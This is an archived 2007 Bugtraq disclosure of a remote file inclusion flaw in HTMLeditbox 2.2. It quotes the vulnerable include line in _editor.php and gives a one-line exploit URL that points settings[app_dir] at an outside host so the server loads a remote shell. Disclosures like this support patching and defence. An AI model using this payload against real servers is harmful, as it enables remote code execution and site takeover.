lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070425105250.19970.qmail@securityfocus.com> Date: 25 Apr 2007 10:52:50 -0000 From: alijsb@...oo.com To: bugtraq@...urityfocus.com Subject: HTMLeditbox & 2.2 >> RFI +++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru bug : _editor.php @include($settings[app_dir].'/inc/config.php'); exploit : http://victim/_editor.php?settings[app_dir]=http://shell ++++++